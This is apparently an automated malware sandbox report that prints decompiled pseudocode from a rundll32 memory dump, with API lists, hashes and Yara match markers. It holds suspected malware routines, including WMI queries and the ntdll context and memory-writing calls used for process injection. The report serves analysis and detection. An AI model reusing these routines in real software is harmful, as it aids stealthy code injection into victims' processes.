				long long* _t342;
				void* _t344;
				void* _t345;
				void* _t357;
				void* _t358;
				long long _t360;
				struct HINSTANCE__* _t362;
				long long* _t364;
				WCHAR* _t366;

				 *((long long*)(_t344 + 8)) = __rcx;
				_t342 = _t344 - 0x50;
				_t345 = _t344 - 0x150;
				 *((long long*)(_t342 + 0x28)) = 0xfffffffe;
				 *((long long*)(_t345 + 0x198)) = __rbx;
				_t358 = __r8;
				_t261 = __rcx;
				r13d = 0;
				 *((intOrPtr*)(_t345 + 0x50)) = r13d;
				 *((long long*)(_t342 - 0x58)) = _t360;
				 *((long long*)(_t342 - 0x50)) = _t360;
				 *((long long*)(_t342 - 0x50)) = 0xf;
				 *((long long*)(_t342 - 0x58)) = _t360;
				 *((intOrPtr*)(_t342 - 0x68)) = r13b;
				 *((long long*)(_t345 + 0x60)) = _t360;
				 *((long long*)(_t345 + 0x58)) = _t360;
				 *((long long*)(_t342 - 0x80)) = _t360;
				 *((long long*)(_t342 - 0x78)) = _t360;
				 *((long long*)(_t342 - 0x78)) = 0xf;
				 *((long long*)(_t342 - 0x80)) = _t360;
				 *((intOrPtr*)(_t345 + 0x70)) = r13b;
				 *((long long*)(_t345 + 0x20)) = _t345 + 0x60;
				_t20 = _t360 + 1; // 0x1
				r8d = _t20;
				__imp__CoCreateInstance(_t341);
				if (__eax >= 0) goto 0x205cc845;
				 *((long long*)(__rcx + 0x18)) = 0xf;
				 *((long long*)(__rcx + 0x10)) = _t360;
				 *((intOrPtr*)(__rcx)) = r13b;
				E0000021521520586E80(__rcx, __rcx, _t345 + 0x70);
				 *((intOrPtr*)(_t345 + 0x50)) = 1;
				_t241 =  *((intOrPtr*)(_t342 - 0x78));
				if (_t241 - 0x10 < 0) goto 0x205cc81f;
				_t266 =  *((intOrPtr*)(_t345 + 0x70));
				if (_t241 + 1 - 0x1000 < 0) goto 0x205cc81a;
				if ((__ecx & 0x0000001f) == 0) goto 0x205cc7ed;
				0x205faadc();
				asm("int3");
				_t243 =  *((intOrPtr*)(_t266 - 8));
				if (_t243 - _t266 < 0) goto 0x205cc7fc;
				0x205faadc();
				asm("int3");
				_t267 = _t266 - _t243;
				if (_t267 - 8 >= 0) goto 0x205cc80b;
				0x205faadc();
				asm("int3");
				if (_t267 - 0x27 <= 0) goto 0x205cc817;
				0x205faadc();
				asm("int3");
				0x205f51e4();
				 *((long long*)(_t342 - 0x78)) = 0xf;
				 *((long long*)(_t342 - 0x80)) = _t360;
				 *((char*)(_t345 + 0x70)) = 0;
				 *((long long*)(_t342 - 0x50)) = 0xf;
				 *((long long*)(_t342 - 0x58)) = _t360;
				 *((char*)(_t342 - 0x68)) = 0;
				goto 0x205ccce0;
				 *((long long*)(_t345 + 0x40)) = _t345 + 0x58;
				 *((long long*)(_t345 + 0x38)) = _t360;
				 *((long long*)(_t345 + 0x30)) = _t360;
				 *((intOrPtr*)(_t345 + 0x28)) = r13d;
				 *((long long*)(_t345 + 0x20)) = _t360;
				r9d = 0;
				r8d = 0;
				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t345 + 0x60)))) + 0x18))() >= 0) goto 0x205cc912;
				_t270 =  *((intOrPtr*)(_t345 + 0x60));
				if (_t270 == 0) goto 0x205cc893;
				 *((intOrPtr*)( *_t270 + 0x10))();
				 *((long long*)(__rcx + 0x18)) = 0xf;
				 *((long long*)(__rcx + 0x10)) = _t360;
				 *__rcx = 0;
				E0000021521520586E80(__rcx, __rcx, _t345 + 0x70);
				 *((intOrPtr*)(_t345 + 0x50)) = 1;
				_t246 =  *((intOrPtr*)(_t342 - 0x78));
				if (_t246 - 0x10 < 0) goto 0x205cc81f;
				_t272 =  *((intOrPtr*)(_t345 + 0x70));
				if (_t246 + 1 - 0x1000 < 0) goto 0x205cc81a;
				if ((__ecx & 0x0000001f) == 0) goto 0x205cc8e4;
				0x205faadc();
				asm("int3");
				_t248 =  *((intOrPtr*)(_t272 - 8));
				if (_t248 - _t272 < 0) goto 0x205cc8f3;
				0x205faadc();
				asm("int3");
				_t273 = _t272 - _t248;
				if (_t273 - 8 >= 0) goto 0x205cc902;
				0x205faadc();
				asm("int3");
				if (_t273 - 0x27 <= 0) goto 0x205cc817;
				0x205faadc();
				_t249 =  *0x20683330; // 0x0
				if (_t249 != 0) goto 0x205cc942;
				GetModuleHandleW(_t366);
				GetProcAddress(_t362);
				 *0x20683330 = _t249;
				 *((intOrPtr*)(_t345 + 0x38)) = r13d;
				 *((long long*)(_t345 + 0x30)) = _t360;
				 *((intOrPtr*)(_t345 + 0x28)) = 3;
				 *((intOrPtr*)(_t345 + 0x20)) = 3;
				r9d = 0;
				r8d = 0;
				if ( *_t249() >= 0) goto 0x205cc98b;
				_t277 =  *((intOrPtr*)(_t345 + 0x60));
				if (_t277 == 0) goto 0x205cc981;
				_t250 =  *_t277;
				 *((intOrPtr*)(_t250 + 0x10))();
				goto 0x205ccc9d;
				 *((long long*)(_t345 + 0x68)) = _t360;
				if ( *((long long*)(__rdx + 0x18)) - 0x10 < 0) goto 0x205cc99a;
				_t336 =  *((intOrPtr*)(__rdx));
				E00000215215205F4DCC(_t250,  *((intOrPtr*)(_t345 + 0x58)));
				 *((long long*)(_t342 + 0xa8)) = _t250;
				if (_t250 == 0) goto 0x205cc9cb;
				 *((long long*)(_t250 + 8)) = _t360;
				 *((intOrPtr*)(_t250 + 0x10)) = 1;
				E00000215215205F6FA0(_t184, _t261, _t336, _t336);
				 *_t250 = _t250;
				goto 0x205cc9ce;
				_t332 = _t360;
				 *((long long*)(_t342 + 8)) = _t332;
				if (_t332 != 0) goto 0x205cc9e2;
				E00000215215205F6F70();
				E00000215215205F4DCC(_t250, _t336);
				 *((long long*)(_t342 + 0xa8)) = _t250;
				if (_t250 == 0) goto 0x205cca17;
				 *((long long*)(_t250 + 8)) = _t360;
				 *((intOrPtr*)(_t250 + 0x10)) = 1;
				E00000215215205F6FA0(_t184, _t261, "WQL", _t336);
				 *_t250 = _t250;
				goto 0x205cca1a;
				_t364 = _t360;
				 *_t342 = _t364;
				if (_t364 != 0) goto 0x205cca2e;
				E00000215215205F6F70();
				_t251 =  *((intOrPtr*)( *((intOrPtr*)(_t345 + 0x58))));
				 *((long long*)(_t345 + 0x28)) = _t345 + 0x68;
				 *((long long*)(_t345 + 0x20)) = _t360;
				r9d = 0x30;
				r15d =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t345 + 0x58)))) + 0xa0))();
				_t337 = _t336 | 0xffffffff;
				_t190 = __esi;
				asm("lock inc ecx");
				if (__esi != 1) goto 0x205cca9b;
				if ( *_t364 == 0) goto 0x205cca7c;
				__imp__#6();
				 *_t364 = _t360;
				if ( *((intOrPtr*)(_t364 + 8)) == 0) goto 0x205cca8e;
				E00000215215205F51EC( *((intOrPtr*)( *((intOrPtr*)(_t345 + 0x58)))), _t261, _t336 | 0xffffffff, _t360);
				 *((long long*)(_t364 + 8)) = _t360;
				E00000215215205F51EC( *((intOrPtr*)( *((intOrPtr*)(_t345 + 0x58)))), _t261, _t336 | 0xffffffff, _t357);
				 *_t342 = _t360;
				asm("lock xadd [edi+0x10], eax");
				if (__esi != 1) goto 0x205ccadb;
				if ( *_t332 == 0) goto 0x205ccabc;
				__imp__#6();
				 *_t332 = _t360;
				if ( *((intOrPtr*)(_t332 + 8)) == 0) goto 0x205ccace;
				E00000215215205F51EC(_t251, _t261, _t336 | 0xffffffff, _t330);
				 *((long long*)(_t332 + 8)) = _t360;
				E00000215215205F51EC(_t251, _t261, _t336 | 0xffffffff, _t334);
				 *((long long*)(_t342 + 8)) = _t360;
				if (r15d >= 0) goto 0x205ccafe;
				_t288 =  *((intOrPtr*)(_t345 + 0x58));
				if (_t288 == 0) goto 0x205ccaf4;
				 *((intOrPtr*)( *_t288 + 0x10))();
				goto 0x205ccc9d;
				_t290 =  *((intOrPtr*)(_t345 + 0x68));
				if (_t290 == 0) goto 0x205ccc6d;
				 *((long long*)(_t342 - 0x70)) = _t360;
				 *((intOrPtr*)(_t342 + 0xa8)) = r13d;
				 *((long long*)(_t345 + 0x20)) = _t342 + 0xa8;
				r8d = 1;
				 *((intOrPtr*)( *_t290 + 0x20))();
				if ( *((intOrPtr*)(_t342 + 0xa8)) == 0) goto 0x205ccc68;
				__imp__#8();
				if ( *((long long*)(_t342 - 0x70)) == 0) goto 0x205ccc68;
				E00000215215205C7DF0(_t261, _t342 - 0x28, _t358, _t337);
				_t321 =  >=  ?  *((void*)(_t342 - 0x28)) : _t342 - 0x28;
				 *((long long*)(_t345 + 0x28)) = _t360;
				 *((long long*)(_t345 + 0x20)) = _t360;
				r8d = 0;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t342 - 0x70)))) + 0x20))();
				_t322 =  *((intOrPtr*)(_t342 + 0x18));
				if (_t322 == 0) goto 0x205ccc28;
				 *((long long*)(_t342 - 0x38)) = _t360;
				 *((long long*)(_t342 - 0x30)) = _t360;
				 *((long long*)(_t342 - 0x30)) = 7;
				 *((long long*)(_t342 - 0x38)) = _t360;
				 *((intOrPtr*)(_t342 - 0x48)) = r13w;
				if ( *_t322 != 0) goto 0x205ccbc0;
				goto 0x205ccbca;
				_t339 = _t360 + 1;
				if ( *((short*)(_t322 + (_t360 + 1) * 2)) != 0) goto 0x205ccbc0;
				E0000021521520588AC0(_t261, _t342 - 0x48, _t322, _t360 + 1, _t360 + 1);
				E00000215215205C7F10(_t261, _t342 + 0x30, _t342 - 0x48);
				E0000021521520586820(E0000021521520588900(__esi, _t261, _t345 + 0x70,  *((intOrPtr*)( *((intOrPtr*)(_t342 - 0x70))))), __esi, _t342 + 0x30);
				if ( *((intOrPtr*)(_t342 - 0x30)) - 8 < 0) goto 0x205ccc17;
				E0000021521520588F90(__esi, _t261,  *((intOrPtr*)(_t342 - 0x48)), _t332, _t339,  *((intOrPtr*)(_t342 - 0x30)) + 1, _t342 + 0x10);
				 *((long long*)(_t342 - 0x30)) = 7;
				 *((long long*)(_t342 - 0x38)) = _t360;
				 *((intOrPtr*)(_t342 - 0x48)) = r13w;
				__imp__#9();
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t342 - 0x70)))) + 0x10))();
				if ( *((intOrPtr*)(_t342 - 0x10)) - 8 < 0) goto 0x205ccc57;
				E0000021521520588F90(__esi, _t261,  *((intOrPtr*)(_t342 - 0x28)), _t332, _t339,  *((intOrPtr*)(_t342 - 0x10)) + 1, _t342 + 0x10);
				 *((long long*)(_t342 - 0x10)) = 7;
				 *((long long*)(_t342 - 0x18)) = _t360;
				 *((intOrPtr*)(_t342 - 0x28)) = r13w;
				_t327 =  *((intOrPtr*)(_t345 + 0x58));
				if (_t327 == 0) goto 0x205ccc85;
				 *((intOrPtr*)( *_t327 + 0x10))();
				_t328 =  *((intOrPtr*)(_t345 + 0x60));
				if (_t328 == 0) goto 0x205ccc9d;
				 *((intOrPtr*)( *_t328 + 0x10))();
				_t306 =  *((intOrPtr*)(_t345 + 0x68));
				if (_t306 == 0) goto 0x205ccca8;
				 *((intOrPtr*)( *_t306 + 0x10))();
				 *((long long*)(_t261 + 0x18)) = 0xf;
				 *((long long*)(_t261 + 0x10)) = _t360;
				 *_t261 = 0;
				_t181 = E0000021521520586E80(_t261, _t261, _t345 + 0x70);
				 *((intOrPtr*)(_t345 + 0x50)) = 1;
				return E0000021521520586820(E0000021521520586820(_t181, __esi, _t345 + 0x70), _t190, _t342 - 0x68);
			}









































                0x215205cc700
                0x215205cc710
                0x215205cc715
                0x215205cc71c
                0x215205cc724
                0x215205cc72c
                0x215205cc732
                0x215205cc735
                0x215205cc738
                0x215205cc73d
                0x215205cc741
                0x215205cc745
                0x215205cc74d
                0x215205cc751
                0x215205cc755
                0x215205cc75a
                0x215205cc75f
                0x215205cc763
                0x215205cc767
                0x215205cc76f
                0x215205cc773
                0x215205cc77d
                0x215205cc78b
                0x215205cc78b
                0x215205cc796
                0x215205cc79e
                0x215205cc7a4
                0x215205cc7ac
                0x215205cc7b0
                0x215205cc7bb
                0x215205cc7c0
                0x215205cc7c8
                0x215205cc7d0
                0x215205cc7d5
                0x215205cc7e0
                0x215205cc7e5
                0x215205cc7e7
                0x215205cc7ec
                0x215205cc7ed
                0x215205cc7f4
                0x215205cc7f6
                0x215205cc7fb
                0x215205cc7fc
                0x215205cc803
                0x215205cc805
                0x215205cc80a
                0x215205cc80f
                0x215205cc811
                0x215205cc816
                0x215205cc81a
                0x215205cc81f
                0x215205cc827
                0x215205cc82b
                0x215205cc830
                0x215205cc838
                0x215205cc83c
                0x215205cc840
                0x215205cc852
                0x215205cc857
                0x215205cc85c
                0x215205cc861
                0x215205cc866
                0x215205cc86b
                0x215205cc86e
                0x215205cc87d
                0x215205cc883
                0x215205cc88b
                0x215205cc890
                0x215205cc893
                0x215205cc89b
                0x215205cc89f
                0x215205cc8aa
                0x215205cc8af
                0x215205cc8b7
                0x215205cc8bf
                0x215205cc8c8
                0x215205cc8d3
                0x215205cc8dc
                0x215205cc8de
                0x215205cc8e3
                0x215205cc8e4
                0x215205cc8eb
                0x215205cc8ed
                0x215205cc8f2
                0x215205cc8f3
                0x215205cc8fa
                0x215205cc8fc
                0x215205cc901
                0x215205cc906
                0x215205cc90c
                0x215205cc912
                0x215205cc91c
                0x215205cc925
                0x215205cc935
                0x215205cc93b
                0x215205cc942
                0x215205cc947
                0x215205cc94c
                0x215205cc954
                0x215205cc95c
                0x215205cc95f
                0x215205cc96f
                0x215205cc971
                0x215205cc979
                0x215205cc97b
                0x215205cc97e
                0x215205cc986
                0x215205cc98b
                0x215205cc995
                0x215205cc997
                0x215205cc99f
                0x215205cc9a7
                0x215205cc9b1
                0x215205cc9b3
                0x215205cc9b7
                0x215205cc9c1
                0x215205cc9c6
                0x215205cc9c9
                0x215205cc9cb
                0x215205cc9ce
                0x215205cc9d5
                0x215205cc9dc
                0x215205cc9e7
                0x215205cc9ef
                0x215205cc9f9
                0x215205cc9fb
                0x215205cc9ff
                0x215205cca0d
                0x215205cca12
                0x215205cca15
                0x215205cca17
                0x215205cca1a
                0x215205cca21
                0x215205cca28
                0x215205cca33
                0x215205cca3b
                0x215205cca40
                0x215205cca45
                0x215205cca57
                0x215205cca5a
                0x215205cca5e
                0x215205cca60
                0x215205cca69
                0x215205cca71
                0x215205cca73
                0x215205cca79
                0x215205cca83
                0x215205cca85
                0x215205cca8a
                0x215205cca96
                0x215205cca9b
                0x215205ccaa1
                0x215205ccaa9
                0x215205ccab1
                0x215205ccab3
                0x215205ccab9
                0x215205ccac3
                0x215205ccac5
                0x215205ccaca
                0x215205ccad6
                0x215205ccadb
                0x215205ccae2
                0x215205ccae4
                0x215205ccaec
                0x215205ccaf1
                0x215205ccaf9
                0x215205ccafe
                0x215205ccb06
                0x215205ccb0c
                0x215205ccb10
                0x215205ccb21
                0x215205ccb2a
                0x215205ccb32
                0x215205ccb3c
                0x215205ccb46
                0x215205ccb51
                0x215205ccb5e
                0x215205ccb6d
                0x215205ccb79
                0x215205ccb7e
                0x215205ccb87
                0x215205ccb8a
                0x215205ccb8d
                0x215205ccb94
                0x215205ccb9a
                0x215205ccb9e
                0x215205ccba2
                0x215205ccbaa
                0x215205ccbae
                0x215205ccbb7
                0x215205ccbbc
                0x215205ccbc0
                0x215205ccbc8
                0x215205ccbd1
                0x215205ccbdf
                0x215205ccbf7
                0x215205ccc05
                0x215205ccc12
                0x215205ccc17
                0x215205ccc1f
                0x215205ccc23
                0x215205ccc2c
                0x215205ccc39
                0x215205ccc45
                0x215205ccc52
                0x215205ccc57
                0x215205ccc5f
                0x215205ccc63
                0x215205ccc6d
                0x215205ccc75
                0x215205ccc7d
                0x215205ccc85
                0x215205ccc8d
                0x215205ccc95
                0x215205ccc98
                0x215205ccca0
                0x215205ccca5
                0x215205ccca8
                0x215205cccb0
                0x215205cccb4
                0x215205cccbf
                0x215205cccc4
                0x215205cccfd

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: String$ConvertFreeVariant_com_issue_error_com_util::$AddressClearCreateHandleInitInstanceModuleProc
                • String ID: CoSetProxyBlanket$ROOT\CIMV2$WQL$ole32.dll
                • API String ID: 1924677790-3464224570
                • Opcode ID: 42ca8b9d58faa4aaba85f2fdb7e65cc6d005e06f451428c74cfd2530b8ff380a
                • Instruction ID: 80ebd6be0a8e64a59d6637a645dd8b828d0b3951d13f3eab8971070e89c0114c
                • Opcode Fuzzy Hash: 42ca8b9d58faa4aaba85f2fdb7e65cc6d005e06f451428c74cfd2530b8ff380a
                • Instruction Fuzzy Hash: B7023737702F60C6EB14DB65E88839E7BA0FB95B98F104555DE8A07BA8CF78C498D740
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535E506C Relevance: 21.2, APIs: 14, Instructions: 238COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: Xp_mulh$Xp_addx$Xp_setw$get_acsize
                • String ID:
                • API String ID: 2413281849-0
                • Opcode ID: 08556232719dacff47f9c58568dd6f539aeb3d9199d3a2cc78726d0cd2e48932
                • Instruction ID: 12b262dc170e12c1e4ed56f378007fa44dc94dc0932552693e172672b51512a9
                • Opcode Fuzzy Hash: 08556232719dacff47f9c58568dd6f539aeb3d9199d3a2cc78726d0cd2e48932
                • Instruction Fuzzy Hash: 6DC1C132E28B498AF701DB7694810FD7336AF9E344B48DB71EA0D329A5EF28B5459740
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0000021520591990 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 195synchronizationCOMMON
                Download Yara Rule
                C-Code - Quality: 43%
                			E0000021521520591990(long long __rbx, void* __rcx, intOrPtr* __rdx, long long __rdi, long long __rsi, void* __r9, char _a16) {
				void* _v40;
				char _v88;
				long long _v96;
				long long _v104;
				char _v112;
				long long _v120;
				long long _v128;
				char _v136;
				void* _t111;
				void* _t112;
				void* _t113;
				long long _t136;
				long long _t137;
				long long _t138;
				long long _t139;
				long long _t140;
				long long _t142;
				intOrPtr* _t174;
				long long _t175;
				long long _t178;
				long long _t195;
				long long _t196;
				void* _t197;

				_t136 = _t178;
				_v120 = 0xfffffffe;
				 *((long long*)(_t136 + 8)) = __rbx;
				 *((long long*)(_t136 + 0x18)) = __rsi;
				 *((long long*)(_t136 + 0x20)) = __rdi;
				r12d = r8d;
				_t174 = __rdx;
				_t197 = __rcx;
				r9d = 0;
				r8d = 0;
				CreateEventW(??, ??, ??, ??);
				_t142 = _t136;
				 *((long long*)(__rdx + 8)) = _t136;
				if (_t136 != 0) goto 0x20591a74;
				_t111 = GetLastError();
				 *((intOrPtr*)( *__rdx))();
				E000002152152058F380(__rdx, __rdx);
				_t195 = _t136;
				_v112 = _t136;
				_v104 = _t136;
				if ( *((intOrPtr*)(_t195 + 8)) + 0xda812030 - 1 <= 0) goto 0x20591a30;
				 *((intOrPtr*)( *_t195 + 0x30))();
				goto 0x20591a35;
				_t137 = _t136 + 2;
				_v96 = _t137;
				_v112 = _t111;
				_v104 = _t195;
				if (((0 | _t111 != 0x00000000) & 1) == 0) goto 0x20591a74;
				if (_t137 != 1) goto 0x20591a55;
				if (_t111 == 0) goto 0x20591a74;
				_t19 =  &_v112; // 0x4d54ee85da811fe8
				_t20 =  &_v88; // 0x4d54ee85da812000
				E0000021521520590B90(0, _t142, _t20, _t19, "thread.entry_event");
				_t21 =  &_v88; // 0x4d54ee85da812000
				E000002152152059DF30(_t111, _t142, _t21, __rdx, "thread.entry_event");
				r9d = 0;
				r8d = r8d ^ r8d;
				CreateEventW(??, ??, ??, ??);
				 *((long long*)(_t197 + 0x10)) = _t137;
				 *((long long*)(_t174 + 0x10)) = _t137;
				if ( *((long long*)(_t197 + 0x10)) != 0) goto 0x20591b20;
				_t112 = GetLastError();
				 *((intOrPtr*)( *_t174))();
				E000002152152058F380(_t174, _t19);
				_t196 = _t137;
				_v112 = _t137;
				_v104 = _t137;
				if ( *((intOrPtr*)(_t196 + 8)) + 0xda812030 - 1 <= 0) goto 0x20591adc;
				 *((intOrPtr*)( *_t196 + 0x30))();
				goto 0x20591ae1;
				_t138 = _t137 + 2;
				_v96 = _t138;
				_v112 = _t112;
				_v104 = _t196;
				if (((0 | _t112 != 0x00000000) & 1) == 0) goto 0x20591b20;
				if (_t138 != 1) goto 0x20591b01;
				if (_t112 == 0) goto 0x20591b20;
				_t37 =  &_v112; // 0x4d54ee85da811fe8
				_t38 =  &_v88; // 0x4d54ee85da812000
				E0000021521520590B90(0, _t142, _t38, _t37, "thread.exit_event");
				_t39 =  &_v88; // 0x4d54ee85da812000
				E000002152152059DF30(_t112, _t142, _t39, _t174, "thread.exit_event");
				_a16 = 0;
				_t41 =  &_a16; // 0x4d54ee85da812068
				_t139 = _t41;
				_v128 = _t139;
				_v136 = 0;
				E00000215215205FACE4(0, r12d, _t139, _t142, _t39, _t174, E0000021521520591C30, _t174);
				 *((long long*)(_t197 + 8)) = _t139;
				if (_t139 != 0) goto 0x20591bf5;
				_t113 = GetLastError();
				 *((intOrPtr*)( *_t174))();
				if (_t142 == 0) goto 0x20591b75;
				CloseHandle(??);
				if ( *((intOrPtr*)(_t197 + 0x10)) == 0) goto 0x20591b84;
				CloseHandle(??);
				E000002152152058F380( *((intOrPtr*)(_t197 + 0x10)), _t37);
				_t175 = _t139;
				_v112 = _t139;
				_v104 = _t139;
				if ( *((intOrPtr*)(_t175 + 8)) + 0xda812030 - 1 <= 0) goto 0x20591bb1;
				 *((intOrPtr*)( *_t175 + 0x30))();
				goto 0x20591bb6;
				_t140 = _t139 + 2;
				_v96 = _t140;
				_v112 = _t113;
				_v104 = _t175;
				if (((0 | _t113 != 0x00000000) & 1) == 0) goto 0x20591bf5;
				if (_t140 != 1) goto 0x20591bd6;
				if (_t113 == 0) goto 0x20591bf5;
				_t57 =  &_v112; // 0x4d54ee85da811fe8
				_t58 =  &_v88; // 0x4d54ee85da812000
				E0000021521520590B90(0, _t142, _t58, _t57, "thread");
				_t59 =  &_v88; // 0x4d54ee85da812000
				E000002152152059DF30(_t113, _t142, _t59, _t175, "thread");
				if (_t142 == 0) goto 0x20591c0f;
				WaitForSingleObject(??, ??);
				return CloseHandle(??);
			}


























                0x21520591990
                0x215205919a6
                0x215205919ae
                0x215205919b2
                0x215205919b6
                0x215205919ba
                0x215205919bd
                0x215205919c0
                0x215205919c3
                0x215205919c6
                0x215205919cf
                0x215205919d5
                0x215205919d8
                0x215205919e9
                0x215205919f5
                0x21520591a00
                0x21520591a03
                0x21520591a08
                0x21520591a0d
                0x21520591a11
                0x21520591a20
                0x21520591a2a
                0x21520591a2e
                0x21520591a38
                0x21520591a3c
                0x21520591a40
                0x21520591a43
                0x21520591a49
                0x21520591a4f
                0x21520591a53
                0x21520591a5c
                0x21520591a60
                0x21520591a64
                0x21520591a6a
                0x21520591a6e
                0x21520591a74
                0x21520591a77
                0x21520591a80
                0x21520591a86
                0x21520591a8a
                0x21520591a93
                0x21520591a9f
                0x21520591aac
                0x21520591aaf
                0x21520591ab4
                0x21520591ab9
                0x21520591abd
                0x21520591acc
                0x21520591ad6
                0x21520591ada
                0x21520591ae4
                0x21520591ae8
                0x21520591aec
                0x21520591aef
                0x21520591af5
                0x21520591afb
                0x21520591aff
                0x21520591b08
                0x21520591b0c
                0x21520591b10
                0x21520591b16
                0x21520591b1a
                0x21520591b22
                0x21520591b25
                0x21520591b25
                0x21520591b29
                0x21520591b2e
                0x21520591b3f
                0x21520591b44
                0x21520591b4b
                0x21520591b57
                0x21520591b64
                0x21520591b6a
                0x21520591b6f
                0x21520591b7c
                0x21520591b7e
                0x21520591b84
                0x21520591b89
                0x21520591b8e
                0x21520591b92
                0x21520591ba1
                0x21520591bab
                0x21520591baf
                0x21520591bb9
                0x21520591bbd
                0x21520591bc1
                0x21520591bc4
                0x21520591bca
                0x21520591bd0
                0x21520591bd4
                0x21520591bdd
                0x21520591be1
                0x21520591be5
                0x21520591beb
                0x21520591bef
                0x21520591bf8
                0x21520591c00
                0x21520591c2f

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: CloseErrorHandleLast$CreateEvent$ObjectSingleWait
                • String ID: thread$thread.entry_event$thread.exit_event
                • API String ID: 2474323891-3017686385
                • Opcode ID: bf86167c571dfc2279f15b415a5019d1000c7284ff4766e008aa38a0cb6467e3
                • Instruction ID: 361e8aaca1e32833a2cf52138b09fbc168d75c03b19875b4b680aa91ff19f0ad
                • Opcode Fuzzy Hash: bf86167c571dfc2279f15b415a5019d1000c7284ff4766e008aa38a0cb6467e3
                • Instruction Fuzzy Hash: 9D71AB33712F30CAEB64DB61A8487DC23A6FFA4B84F15455ADE5A57798DF38C8468380
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205CA49C Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 47libraryloaderCOMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: AddressProc$HandleModule
                • String ID: ZwAllocateVirtualMemory$ZwGetContextThread$ZwReadVirtualMemory$ZwSetContextThread$ZwWriteVirtualMemory$ntdll.dll
                • API String ID: 667068680-1731939869
                • Opcode ID: 9ee053719bee77af573e3c090f1fa2f87a55a8d6bb8722cc3d844276aecaba7b
                • Instruction ID: 929901f9018235b64156c3fa8056472978e92af422d34d7712452aa53bdaf5c5
                • Opcode Fuzzy Hash: 9ee053719bee77af573e3c090f1fa2f87a55a8d6bb8722cc3d844276aecaba7b
                • Instruction Fuzzy Hash: 97110D77707F61D5FE66CB14E99C3A427A0AFA8B54FA440A59D0E02359EF7CA448C200
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205A05E0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 198COMMON
                Download Yara Rule
                C-Code - Quality: 59%
                			E00000215215205A05E0(signed int __edx, short __esi, long long __rbx, long long __rcx, void* __r8, void* __r9) {
				void* __rdi;
				void* __rsi;
				void* _t95;
				void* _t96;
				signed int _t97;
				signed int _t98;
				void* _t107;
				signed char* _t139;
				signed char* _t140;
				long long _t142;
				void* _t143;
				long long _t150;
				void* _t159;
				signed long long _t162;
				signed int _t163;
				long long _t164;
				void* _t173;
				signed char* _t174;
				signed char* _t178;
				void* _t179;
				void* _t181;
				void* _t182;
				void* _t184;
				void* _t185;
				void* _t187;
				signed char* _t193;
				void* _t195;
				void* _t196;
				void* _t197;
				void* _t199;

				_t195 = __r9;
				_t146 = __rbx;
				_t104 = __edx;
				 *((long long*)(_t187 + 8)) = __rcx;
				_t185 = _t187 - 0x37;
				 *((long long*)(_t185 - 0x21)) = 0xfffffffe;
				 *((long long*)(_t187 - 0xc0 + 0xf8)) = __rbx;
				_t182 = __r9;
				_t197 = __r8;
				r15d = __edx & 0x0000ffff;
				if ( *((intOrPtr*)(__r8 + 8)) + 2 - 0xffff <= 0) goto 0x205a06ae;
				 *((long long*)(_t185 - 0x59)) = 0x206278d0;
				 *((long long*)(_t185 - 0x51)) = 0x206278d0;
				 *((long long*)(_t185 - 0x49)) = 0x206278d0;
				 *(_t185 - 0x69) = "field name too large";
				 *(_t185 - 0x61) = 1;
				_t11 = _t185 - 0x51; // -78
				_t12 = _t185 - 0x69; // -102
				E00000215215205F7764(__rbx, _t12, _t11, _t178, __r9);
				 *((long long*)(_t185 - 0x59)) = 0x20627910;
				 *((long long*)(_t185 - 0x59)) = 0x20627940;
				 *((long long*)(_t185 - 0x39)) = "D:\\Sources\\boost_1_78_0\\boost/beast/http/impl/fields.hpp";
				 *(_t185 - 0x31) = "struct boost::beast::http::basic_fields<class std::allocator<char> >::element &__cdecl boost::beast::http::basic_fields<class std::allocator<char> >::new_element(enum boost::beast::http::field,class boost::basic_string_view<char,struct std::char_traits<char> >,class boost::basic_string_view<char,struct std::char_traits<char> >)";
				 *((long long*)(_t185 - 0x29)) = 0x3c9;
				_t18 = _t185 - 0x39; // -54
				_t19 = _t185 - 0x59; // -86
				_t20 = _t185 - 0x19; // -22
				E000002152152059FCD0(_t146, _t20, _t19, __r9, _t18, _t199, _t196);
				_t21 = _t185 - 0x19; // -22
